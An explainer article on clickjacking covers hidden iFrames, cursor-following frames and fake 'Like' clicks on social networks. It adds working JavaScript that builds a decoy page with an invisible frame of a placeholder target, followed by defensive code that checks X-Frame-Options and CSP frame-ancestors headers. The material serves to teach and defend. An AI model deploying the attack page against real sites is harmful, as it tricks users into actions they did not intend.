What Are Clickjacking Attacks?
A clickjacking attack, also known as a user interface (UI) redress attack, tricks a user into clicking on something other than what she believes she is clicking. The user thinks she is interacting with the Web page displayed on the screen, but her clicks actually land on elements of another Web page, chosen by the attacker, that is hidden in front of or beneath the page she can see.
iFrame
Clickjacking attacks take advantage of the Hypertext Markup Language (HTML) inline frame element, or iFrame, which allows one HTML document to be embedded, inside a frame, in another HTML document. An attacker loads the target page (the one on which he wants a click to happen) into an iFrame on a page he controls, then uses Cascading Style Sheets (CSS) to make the frame transparent, or to crop it, so that nothing but the region on which he wants users to click is left in play.
Scripting
A typical clickjacking attack uses two nested iFrames. The outer iFrame is the smaller of the two and acts as a cropping window onto the inner iFrame, which must be large enough that the target region, or element, is in view without scrolling. JavaScript can then keep the invisible outer window moving so that it always sits under the mouse cursor; the user then clicks on the target wherever she clicks on the page, and the outer iFrame can be just 10 or 20 pixels square.
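The layout described in the two sections above, as an added example that is not part of the original article: the geometry is written as plain functions so it can be checked on its own, and the browser part builds a decoy, a tiny clipped window, and the large inner frame, then moves the window under the cursor. The target URL and the position of the target element are assumptions constructed for illustration; nothing here will succeed against a page that forbids framing.

```javascript
// Added example: clickjacking page geometry. TARGET_URL and TARGET_RECT are
// constructed assumptions, not real values; the rect is the box the target
// element occupies in the framed page's own coordinate system.
const TARGET_URL = "https://victim.example/account";     // assumed
const TARGET_RECT = { x: 640, y: 420, w: 120, h: 32 };   // assumed
const WINDOW_SIZE = 20;  // the outer "window", px square, as the article describes

// Offset of the inner frame inside the window so that the centre of the
// target element sits at the centre of the window.
function innerFrameOffset(rect, windowSize) {
  return {
    left: Math.round(windowSize / 2 - (rect.x + rect.w / 2)),
    top: Math.round(windowSize / 2 - (rect.y + rect.h / 2)),
  };
}

// Position of the window on the attacker's page so that it is centred
// on the cursor.
function windowPosition(cursorX, cursorY, windowSize) {
  return { left: cursorX - windowSize / 2, top: cursorY - windowSize / 2 };
}

// Does a click at (x, y) on the attacker's page, with the window last placed
// under (cursorX, cursorY), land on the target element?
function clickHitsTarget(x, y, cursorX, cursorY, rect, windowSize) {
  const win = windowPosition(cursorX, cursorY, windowSize);
  const inner = innerFrameOffset(rect, windowSize);
  const inWindow = x >= win.left && x < win.left + windowSize &&
                   y >= win.top && y < win.top + windowSize;
  if (!inWindow) return false;           // clipped away by the window
  // Translate into the framed page's coordinates and test against the rect;
  // a target smaller than the window can still be missed near the edges.
  const tx = x - win.left - inner.left;
  const ty = y - win.top - inner.top;
  return tx >= rect.x && tx < rect.x + rect.w &&
         ty >= rect.y && ty < rect.y + rect.h;
}

// Browser-only part (skipped under Node). The article's outer iFrame is
// played here by a clipped, transparent div on the same page; the effect is
// the same: a 20px window onto a much larger, invisible frame of the target.
function buildAttackPage(doc) {
  const decoy = doc.createElement("p");
  decoy.textContent = "Click anywhere to confirm you are over 18";
  doc.body.appendChild(decoy);

  const win = doc.createElement("div");
  win.style.cssText =
    `position:absolute;width:${WINDOW_SIZE}px;height:${WINDOW_SIZE}px;` +
    "overflow:hidden;opacity:0;z-index:2";

  // Inner frame: large enough that the target needs no scrolling.
  const frame = doc.createElement("iframe");
  frame.src = TARGET_URL;
  frame.setAttribute("scrolling", "no");
  const inner = innerFrameOffset(TARGET_RECT, WINDOW_SIZE);
  frame.style.cssText =
    "position:absolute;width:1200px;height:900px;border:0;" +
    `left:${inner.left}px;top:${inner.top}px`;
  win.appendChild(frame);
  doc.body.appendChild(win);

  // Follow the cursor. The parent page only receives mousemove while the
  // cursor is outside the frame, which is why the window is kept tiny.
  doc.addEventListener("mousemove", (e) => {
    const p = windowPosition(e.pageX, e.pageY, WINDOW_SIZE);
    win.style.left = p.left + "px";
    win.style.top = p.top + "px";
  });
}

if (typeof document !== "undefined") buildAttackPage(document);
```

A current browser will render the inner frame only if the framed site sends no X-Frame-Options header and no Content Security Policy frame-ancestors directive that forbids it, which is why those headers are the defence that matters.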
Nuisance
Clickjacking attacks work across all computer operating systems, because they depend on the browser rather than the operating system, but, so far, have been used only to create a nuisance on social networking sites, such as Facebook and Twitter. Facebook users, for example, may see links to pages that their friends have apparently "liked." The links are entirely spurious: they lead to a page carrying some instruction, such as to click a button confirming that the visitor is over 18 years of age. What users actually click is an invisible "Like" button, framed over the visible one, so that they, too, recommend the malicious page to their friends.
Phishing & Malware
Clickjacking attacks may not yet have been used for fraudulent purposes, such as phishing or delivering malicious software (malware), but according to Graham Cluley, the senior technology consultant at Sophos, the potential exists for them to be adapted to do so. Certain Web browsers offer small, free plug-ins that warn against potential clickjacking attacks. These plug-ins do, however, typically require some technical know-how, and they also warn against clicking on Flash videos, which are widely and legitimately used on the Web. The more durable defence belongs to the site being framed: it can tell the browser not to render it inside another site's frame, using the X-Frame-Options response header or the frame-ancestors directive of a Content Security Policy.
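The server-side check a practitioner would want here, as an added example that is not from the article or from any browser vendor: given a page's response headers, decide whether a particular origin is allowed to frame it, following the rules browsers apply (a Content Security Policy frame-ancestors directive takes precedence over X-Frame-Options, and the obsolete ALLOW-FROM form of X-Frame-Options is ignored by current browsers). The header sets and origins are constructed for illustration.

```javascript
// Added example: can `framerOrigin` embed a page from `pageOrigin` that was
// served with `headers`? `headers` is an object keyed by lower-case header
// name. Returns { allowed, reason }.

function defaultPort(protocol) {
  return { "https:": "443", "http:": "80" }[protocol] || "";
}

function sameOrigin(a, b) {
  return a.protocol === b.protocol && a.hostname === b.hostname &&
    (a.port || defaultPort(a.protocol)) === (b.port || defaultPort(b.protocol));
}

// Match one frame-ancestors source expression against the framing origin.
// Handles 'none', 'self', *, scheme-source (https:) and host-source with an
// optional scheme, a leading "*." wildcard label and an optional port.
function sourceMatches(source, framer, page) {
  const s = source.toLowerCase();
  if (s === "'none'") return false;
  if (s === "*") return true;
  if (s === "'self'") return sameOrigin(framer, page);
  if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return framer.protocol === s;
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([a-z0-9.-]+)(?::(\d+|\*))?$/.exec(s);
  if (!m) return false;                          // unparsable source: no match
  const [, scheme, wildcard, host, port] = m;
  if (scheme && scheme + ":" !== framer.protocol) return false;
  const fh = framer.hostname;
  if (wildcard ? !fh.endsWith("." + host) : fh !== host) return false;
  if (port && port !== "*" && port !== (framer.port || defaultPort(framer.protocol))) return false;
  return true;
}

// Source list of the frame-ancestors directive, or null if the policy has none.
function frameAncestorsSources(headers) {
  const csp = headers["content-security-policy"];
  if (!csp) return null;
  for (const directive of csp.split(";")) {
    const tokens = directive.trim().split(/\s+/).filter(Boolean);
    if (tokens.length && tokens[0].toLowerCase() === "frame-ancestors") {
      return tokens.slice(1);                    // empty list matches nothing
    }
  }
  return null;
}

function framingAllowed(headers, framerOrigin, pageOrigin) {
  const framer = new URL(framerOrigin);
  const page = new URL(pageOrigin);

  // CSP frame-ancestors, when present, overrides X-Frame-Options entirely.
  const sources = frameAncestorsSources(headers);
  if (sources) {
    const allowed = sources.some((src) => sourceMatches(src, framer, page));
    return { allowed, reason: "frame-ancestors" };
  }

  const xfo = (headers["x-frame-options"] || "").trim().toUpperCase();
  if (xfo === "DENY") return { allowed: false, reason: "x-frame-options DENY" };
  if (xfo === "SAMEORIGIN") {
    return { allowed: sameOrigin(framer, page), reason: "x-frame-options SAMEORIGIN" };
  }
  if (xfo.startsWith("ALLOW-FROM")) {
    // Obsolete: current browsers ignore the header, leaving the page frameable.
    return { allowed: true, reason: "obsolete ALLOW-FROM ignored" };
  }
  return { allowed: true, reason: "no framing policy" };
}
```

Run it against the headers of any page that hosts a state-changing button: a result of "no framing policy" or "obsolete ALLOW-FROM ignored" for an untrusted origin is exactly the condition the attack pages above need.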